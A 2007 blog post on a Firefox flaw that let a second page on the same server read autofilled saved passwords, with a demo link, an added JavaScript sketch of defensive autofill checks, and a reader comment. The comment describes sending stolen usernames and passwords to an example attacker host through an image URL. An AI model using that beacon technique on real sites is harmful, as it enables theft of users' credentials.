Firefox vulnerable to username and password theft

Firefox is not having a good week. Hot on the heels of the "Hey Mozilla: Quotes are not legal in a URL" embarrassment, a vulnerability that exposes the usernames and passwords of FF users has been reported that apparently affects Firefox 2.0.0.5 and earlier.

To quote Heise Security, "Firefox, if allowed, can store usernames and passwords. If you visit a login page again, the password is then entered automatically. But this means that a second, evil page on the same server could steal those saved passwords."

Demonstration page here:
http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml?name=noam&password=noampassword#

JavaScript must be enabled for the exploit to work.

This vulnerability holds real potential for harm in the current Internet environment, in which criminals are breaking into servers all over the world and inserting malicious code into legitimate Web pages: code that tries to take advantage of various security flaws in Firefox, Opera and IE to infect a visitor's Web browser. It would be a simple matter for the criminals to also upload an "evil page" to a hacked server to capture the usernames and passwords of FF users.
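The checks a browser password manager can apply before it autofills a saved login, as an added JavaScript illustration. This is not Firefox's code and not from Heise, and the page does not say which of these checks Firefox applied; the record layout, the function names and the sample saved login are assumptions made for the example.

```javascript
// Added illustration, not Firefox's or Heise's code: three checks a password
// manager can run before writing a saved login into a form. Record layout,
// names and sample data are assumptions for this example.

// Constructed sample: a saved login records the page origin it was saved on
// and the origin the login form submitted to at that time.
const savedLogins = [
  {
    origin: "https://dewimorgan.livejournal.com",
    formActionOrigin: "https://dewimorgan.livejournal.com",
    username: "dewimorgan",
    password: "hunter2", // constructed sample value
  },
];

// Resolve a form's action attribute against the page URL and return the
// origin it would post to. An empty or missing action posts back to the
// current page.
function formActionOrigin(pageUrl, action) {
  const target = action && action.trim() !== ""
    ? new URL(action, pageUrl)
    : new URL(pageUrl);
  return target.origin;
}

// Decide which saved login, if any, may be filled into the form on pageUrl.
//   1. User gesture: while userInteracted is false nothing is written into
//      the fields, so script on the page has nothing to read until the user
//      acts on the form.
//   2. Origin scoping: the record must have been saved for this exact origin,
//      so per-user subdomains (x.livejournal.com vs y.livejournal.com) keep
//      different users' logins apart.
//   3. Action check: the form must post where the original form posted, so a
//      page on the same host whose form submits elsewhere is not filled.
function selectLoginForFill(logins, pageUrl, action, userInteracted) {
  if (!userInteracted) return null;
  const pageOrigin = new URL(pageUrl).origin;
  const actionOrigin = formActionOrigin(pageUrl, action);
  const match = logins.find(
    (e) => e.origin === pageOrigin && e.formActionOrigin === actionOrigin
  );
  return match || null;
}

// What the form-filling code would receive: the credential pair or null.
function autofillDecision(pageUrl, action, userInteracted) {
  const entry = selectLoginForFill(savedLogins, pageUrl, action, userInteracted);
  return entry ? { username: entry.username, password: entry.password } : null;
}
```

The origin check is what makes the per-user subdomains mentioned in the comments a meaningful boundary: two users under one hostname share an origin, while user.livejournal.com and other.livejournal.com do not. The action check narrows the exposure but cannot remove it on its own, since a second page on the same server can point its form at the same action; keeping the fields empty until the user interacts is what leaves page script with nothing to read.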

Published Mon, Jul 23 2007 15:08 by sandi

Comments

# re: Firefox vulnerable to username and password theft

Monday, July 23, 2007 3:54 PM by Dewi Morgan

Um... call me slow, but could you explain how this is any different to any other autologin software on the market?

Many, many things rely on a single trusted domain. This is why, if you go to your own LiveJournal or Geocities, you are now faced with a domain called something like dewimorgan.livejournal.com: the domain is a separate thing to prevent two people sharing the same "trusted domain".

If someone has an evil script embedded into your page, and a serverside script to handle it, then you have *already lost*.

They already have all your customers' login information, and far more. For a site to get the information that you trust that site with is trivial on every browser, by design. You WANT them to have the information you want them to have.

I've heard it argued that it's hard to get the info from one domain's page to a remote server without triggering security alerts in the browser, but img src="evil.example.com/yourName/yourPass/transparent.gif" should work just fine.

Usernames and passwords are only as secure as the websites that run them. Which is generally "not very". Usernames and passwords on the web are just to help the site designers, and to make things easier for you, not to give YOU any safety or security. In the very few cases where this is not true (paypal, your bank, ebay), you should not log into those sites unless you trust that company to be able to prevent malicious scripting on its pages from stealing your details.

That applies to any JS-capable browser ever written.